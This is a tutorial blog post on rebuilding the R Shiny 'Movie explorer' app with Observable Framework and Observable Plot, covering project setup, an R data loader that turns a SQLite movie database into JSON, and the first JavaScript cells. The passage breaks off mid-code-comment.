&lt;p&gt;If you like &lt;a href="https://ggplot2.tidyverse.org/" rel="external"&gt;ggplot2&lt;/a&gt; and like the look of d3 but are put off by the idea of having to dive deep into hardcore JavaScript and low-level SVG primitives, Observable Plot could be just the thing for you. Even if you don&amp;rsquo;t know JavaScript, if you can read JSON and have some experience with reactive programming in a notebook, then I suspect you could probably pick up Observable Plot in the Observable environment fairly quickly.&lt;/p&gt;
&lt;p&gt;More recently, the Observable team released &lt;a href="https://observablehq.com/framework/" rel="external"&gt;Observable Framework&lt;/a&gt; (often shortened to just &amp;ldquo;Framework&amp;rdquo; with a capital &amp;ldquo;F&amp;rdquo;), in their own words:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Observable Framework is an open-source static site generator for data apps, dashboards, reports, and more. Framework includes a preview server for local development, and a command-line interface for automating builds &amp;amp; deploys.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;You write simple Markdown pages — with interactive charts and inputs in reactive JavaScript, and with data snapshots generated by loaders in any programming language (SQL, Python, R, and more) — and Framework compiles it into a static site with instant page loads for a great user experience. Since everything is just files, you can use your preferred editor and source control, write unit tests, share code with other apps, integrate with CI/CD, and host projects anywhere.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Having a background in both data science and web development, I&amp;rsquo;ve spent many hours with the {ggplot2} and {shiny} packages and many more wrangling and visualising data using d3. I&amp;rsquo;ve also dabbled with the Observable environment but, until now, never used Observable Plot. With the addition of Observable Framework, this seemed like an opportune time to take a look at both and see how they compare to Shiny.&lt;/p&gt;
&lt;h2 id="the-shiny-app"&gt;The Shiny App&lt;/h2&gt;
&lt;p&gt;To pick a suitable app to experiment with I scoured the &lt;a href="https://shiny.posit.co/r/gallery/" rel="external"&gt;Shiny gallery page&lt;/a&gt;. I wanted a &amp;ldquo;Goldilocks&amp;rdquo; example: not really simple but not highly complex, either. And, obviously, something with a chart. The &lt;a href="https://shiny.posit.co/r/gallery/interactive-visualizations/movie-explorer/" rel="external"&gt;Movie explorer&lt;/a&gt; seemed to fit the bill perfectly: a single chart but with lots of permitted modifications. Perfect for some reactive programming. A zoomed out screenshot of the app (below) shows that it is, perhaps, too tall. This means that users would have to scroll to see those controls lying at the bottom, putting the top of the chart out of view.&lt;/p&gt;
&lt;picture&gt;
&lt;source srcset="assets/shiny.webp 1x, assets/shiny@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/shiny.png" class="screenshot" alt="A screenshot of the Movie explorer Shiny app. A scatterplot can be seen on the right while a tall sidebar of controls - range sliders, select menus and text inputs sits on the left of the screen."&gt;
&lt;/picture&gt;
&lt;br&gt;
&lt;br&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-shiny-to-observable"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="github"&gt;GitHub&lt;/h2&gt;
&lt;p&gt;You can follow along with this blog post yourself by adding and removing code, step-by-step. You can also clone &lt;a href="https://github.com/jumpingrivers/observable-framework-movie-explorer" rel="external"&gt;our repository&lt;/a&gt; from GitHub:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git clone https://github.com/jumpingrivers/observable-framework-movie-explorer.git
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &amp;ldquo;main&amp;rdquo; branch here is in the &amp;ldquo;final&amp;rdquo; state of the app but there are also tags marking the commits for the end of each step we take, that can be easily switched to, as noted at the end of each section with the short code blocks that look &lt;span class="switch"&gt;like this&lt;/span&gt;.&lt;/p&gt;
&lt;h2 id="creating-the-default-framework-app"&gt;Creating the Default Framework App&lt;/h2&gt;
&lt;p&gt;The website for Observable Framework has an excellent &lt;a href="https://observablehq.com/framework/getting-started" rel="external"&gt;Getting started&lt;/a&gt; guide. Here we&amp;rsquo;ll just steal from &lt;a href="https://observablehq.com/framework/getting-started#1-create" rel="external"&gt;step 1&lt;/a&gt; of that. You&amp;rsquo;ll need a fairly recent version (version 18 or above at the time of writing) of &lt;a href="https://nodejs.org/en/" rel="external"&gt;Node.js installed&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;At the command line, in the parent directory for your future project, run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npx @observablehq/framework@latest create
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and simply accept all the default values by pressing Enter.&lt;/p&gt;
&lt;p&gt;To get a live-updating preview of the site run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm run dev
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will launch your default browser and you&amp;rsquo;ll now have something that looks like the image below.&lt;/p&gt;
&lt;picture&gt;
&lt;source srcset="assets/start.webp 1x, assets/start@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/start.png" class="screenshot" alt=""&gt;
&lt;/picture&gt;
&lt;code class="switch"&gt;
git switch --detach start
&lt;/code&gt;
&lt;h2 id="generating-the-data-file"&gt;Generating the Data File&lt;/h2&gt;
&lt;p&gt;From following the above we end up with a bunch of stuff we don&amp;rsquo;t actually need for our app. But some of it is useful for pointing us in the right direction, we&amp;rsquo;ll clear the rest out later.&lt;/p&gt;
&lt;p&gt;In the &amp;ldquo;src/data&amp;rdquo; directory there&amp;rsquo;s a file with the slightly odd-looking &amp;ldquo;.csv.js&amp;rdquo; extension. The .js extension tells Observable Framework that the content of the file is JavaScript. Observable then knows to execute the file using the node CLI. The .csv extension is used for the generated file name, i.e. Observable Framework sees launches.csv.js and passes it to node, the output from the script is then saved to a file called launches.csv.&lt;/p&gt;
&lt;aside&gt;
&lt;p&gt;The output of a script should correspond to the inner extension specified in the script name, i.e. running launches.csv.js should generate a CSV file while running data.json.js should generate a JSON file. However, Framework does not check that this is the case, it only cares about the second extension of the source file.&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;But it&amp;rsquo;s not just the .js extension Framework knows what to do with. It also understands that .py is Python, .rs is rust and .go is Go. And, most importantly for us, it knows to use &lt;code&gt;Rscript&lt;/code&gt; when a file has the extension .R. To work, these scripts (called data loaders in the Framework documentation) need to write to standard output. In an R script we can do that explicitly with the &lt;code&gt;print&lt;/code&gt; function.&lt;/p&gt;
&lt;aside&gt;
&lt;p&gt;Be careful not to &lt;code&gt;print&lt;/code&gt; debugging code to standard output in your R script. That will likely create a whole new bug when your app runs as it gets included in the generated file. This is definitely not a problem that stumped me for a good few minutes 🤥.&lt;/p&gt;
&lt;p&gt;You can use &lt;code&gt;message&lt;/code&gt; instead of &lt;code&gt;print&lt;/code&gt; for messages you want to send to the terminal rather than the data file since &lt;code&gt;message&lt;/code&gt; &lt;a href="https://stat.ethz.ch/R-manual/R-patched/library/base/html/message.html" rel="external"&gt;directs its output to stderr&lt;/a&gt; by default.&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;All we need now is our own data. Helpfully the &lt;a href="https://github.com/rstudio/shiny-examples/tree/main/051-movie-explorer" rel="external"&gt;data and code for the Shiny app&lt;/a&gt; is MIT-licensed and on GitHub.&lt;/p&gt;
&lt;p&gt;The top of the server.R file looks like this&lt;/p&gt;
&lt;details open&gt;&lt;summary&gt;Top of the Shiny app's server.R file&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggvis)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(RSQLite)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dbplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Set up handles to database tables on app start&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;db &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;src_sqlite&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;movies.db&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;omdb &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tbl&lt;/span&gt;(db, &lt;span style="color:#a5d6ff"&gt;&amp;#34;omdb&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tomatoes &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tbl&lt;/span&gt;(db, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tomatoes&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Join tables, filtering out those with &amp;lt;10 reviews, and select specified columns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;all_movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;inner_join&lt;/span&gt;(omdb, tomatoes, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ID&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Reviews &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(ID, imdbID, Title, Year, Rating_m &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Rating.x, Runtime, Genre, Released,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Director, Writer, imdbRating, imdbVotes, Language, Country, Oscars,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Rating &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Rating.y, Meter, Reviews, Fresh, Rotten, userMeter, userRating, userReviews,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; BoxOffice, Production, Cast)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;We can use this as a starting point but:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;We don&amp;rsquo;t need the {ggvis} library;&lt;/li&gt;
&lt;li&gt;We have to reference our own copy of the movies.db SQLite database;&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;src_sqlite&lt;/code&gt; function is deprecated;&lt;/li&gt;
&lt;li&gt;It turns out there&amp;rsquo;s more data in the &lt;code&gt;all_movies&lt;/code&gt; object than we actually need.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The following code, that I put in a file called movies.json.R and placed in the &amp;ldquo;src/data&amp;rdquo; directory alongside the movies.db database, deals with all these issues:&lt;/p&gt;
&lt;details open&gt;&lt;summary&gt;src/data/movies.json.R&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(RSQLite)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dbplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Hack to find the database path&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;script_directory &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gsub&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;--file=&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;commandArgs&lt;/span&gt;()[4])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;db_path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dirname&lt;/span&gt;(script_directory), &lt;span style="color:#a5d6ff"&gt;&amp;#34;movies.db&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Updated code to no longer use deprecated function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conn &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dbConnect&lt;/span&gt;(RSQLite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;SQLite&lt;/span&gt;(), db_path)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;omdb &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tbl&lt;/span&gt;(conn, &lt;span style="color:#a5d6ff"&gt;&amp;#34;omdb&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tomatoes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tbl&lt;/span&gt;(conn, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tomatoes&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Removed films without a BoxOffice value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Select only the variables we actually use&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;all_movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;inner_join&lt;/span&gt;(omdb, tomatoes, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ID&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Reviews &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(BoxOffice)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(Title, Runtime, Genre, Released, Director, Oscars,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Rating &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Rating.y, Meter, Reviews, BoxOffice, Cast)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Convert data to a JSON string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;json &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; all_movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;collect&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toJSON&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Tidy up database connection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dbDisconnect&lt;/span&gt;(conn)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Print data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(json)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;If you followed the server.R code from the original Shiny app then hopefully most of these changes make sense. The exception is probably the &amp;ldquo;Hack to find the database path&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;script_directory &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gsub&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;--file=&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;commandArgs&lt;/span&gt;()[4])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;db_path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dirname&lt;/span&gt;(script_directory), &lt;span style="color:#a5d6ff"&gt;&amp;#34;movies.db&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I know I&amp;rsquo;ve put the database in the same directory as my R script but the script needs to know the path relative to where it&amp;rsquo;s executed from. This isn&amp;rsquo;t actually obvious at this point. But we can find the path from the execution location to the script using the &lt;code&gt;commandArgs&lt;/code&gt; function. The rest then is just some ugly code to take the output of the &lt;code&gt;commandArgs&lt;/code&gt; function, find the script relative to the execution location and then replace the script file name with the database file name that we know lives in the same directory.&lt;/p&gt;
&lt;aside&gt;
&lt;p&gt;Since writing this code, it&amp;rsquo;s been pointed out to me that a cleaner solution is to use &lt;code&gt;here::here&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;db_path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; here&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;here&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;src&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;data&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;movies.db&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The downside to this is the documentation for the function states that the &amp;ldquo;package is intended for interactive use only&amp;rdquo;, so use at your own risk.&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;We can test our script by installing dplyr, RSQLite and dbplyr as necessary and then running (from the root of the project):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rscript src/data/movies.json.R &amp;gt; movies.json
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will create a JSON file, movies.json, with our data in the root of the project. You can delete this as it&amp;rsquo;s not needed.&lt;/p&gt;
&lt;p&gt;We also no longer need the initial files in the &amp;ldquo;src/data&amp;rdquo; directory — events.json and launches.csv.js — and can delete them.&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s everything we want to do in R covered. Now to actually build the movies app.&lt;/p&gt;
&lt;code class="switch"&gt;
git switch --detach data
&lt;/code&gt;
&lt;h2 id="the-markdown-file"&gt;The Markdown File&lt;/h2&gt;
&lt;p&gt;For a simple app made of a single page the expectation is that the content of the app is placed inside a markdown file called index.md directly inside of the &amp;ldquo;src&amp;rdquo; directory of the project. This already exists in our generated project, alongside another couple of markdown files we can safely delete.&lt;/p&gt;
&lt;p&gt;So now we write the &amp;ldquo;content&amp;rdquo; of our app in the index.md file in place of original content we generated in the &amp;ldquo;Getting Started&amp;rdquo; section. Being a markdown file, you may think this would end up containing a load of markdown syntax. It turns out that in our case the file mostly looks like blocks of JavaScript… because that&amp;rsquo;s what it is.&lt;/p&gt;
&lt;p&gt;The page starts,however, with use of explicit HTML markup: &lt;code&gt;&amp;lt;h1&amp;gt;&amp;lt;/h1&amp;gt;&lt;/code&gt;. That&amp;rsquo;s because Observable Framework automatically turns headings created using # markdown syntax into anchor points (i.e. links to that specific part of the page). This is useful for writing &amp;ldquo;Help&amp;rdquo; or other documentation, as you can easily link to specific parts of the page, but isn&amp;rsquo;t particularly useful here.&lt;/p&gt;
&lt;p&gt;As already noted, most of the markdown file is &amp;ldquo;fenced&amp;rdquo; blocks of JavaScript using the syntax ```js&amp;hellip;```. The critical thing here to understand is that these blocks are actually executed in the browser. They are not simply there for displaying code to the user. Framework is reactive by default and the bit I had (and still have, if we&amp;rsquo;re honest) to get my head around is that each fenced block forms a &amp;ldquo;cell&amp;rdquo;. The thing that made most sense to me was thinking of cells in Excel: you change the value in a cell and the &lt;a href="https://observablehq.com/@observablehq/how-observable-runs" rel="external"&gt;values of other cells that depend on it automatically update&lt;/a&gt; regardless of where the cell is positioned in the two-dimensional grid of the spreadsheet. Still, with Framework, I&amp;rsquo;m not sure how much &amp;ldquo;stuff&amp;rdquo; should go in a single cell: What is the best practice here? Does it matter so long as the output is correct in terms of both value and position on the page? Is there any significant effect on performance? How do the answers to the previous questions change when we go from creating notebooks to creating dashboards?&lt;/p&gt;
&lt;p&gt;My current thinking on this can be summarised roughly as &amp;ldquo;create blocks of stuff that looks like it goes together and seems to work, with some cells dealing with the UI and some cells responsible for the graphic&amp;rdquo;. So let&amp;rsquo;s cover each block/cell in turn.&lt;/p&gt;
&lt;h3 id="building-the-ui"&gt;Building the UI&lt;/h3&gt;
&lt;p&gt;The first cell covers the loading of the data and some basic processing of it:&lt;/p&gt;
&lt;div class="resizable"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Load the data from the file we generated
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; FileAttachment(&lt;span style="color:#a5d6ff"&gt;&amp;#39;./data/movies.json&amp;#39;&lt;/span&gt;).json();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Sort the data by number of oscars won. This ends up putting the
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// multi-oscar-winning movies at the end of the data array so that
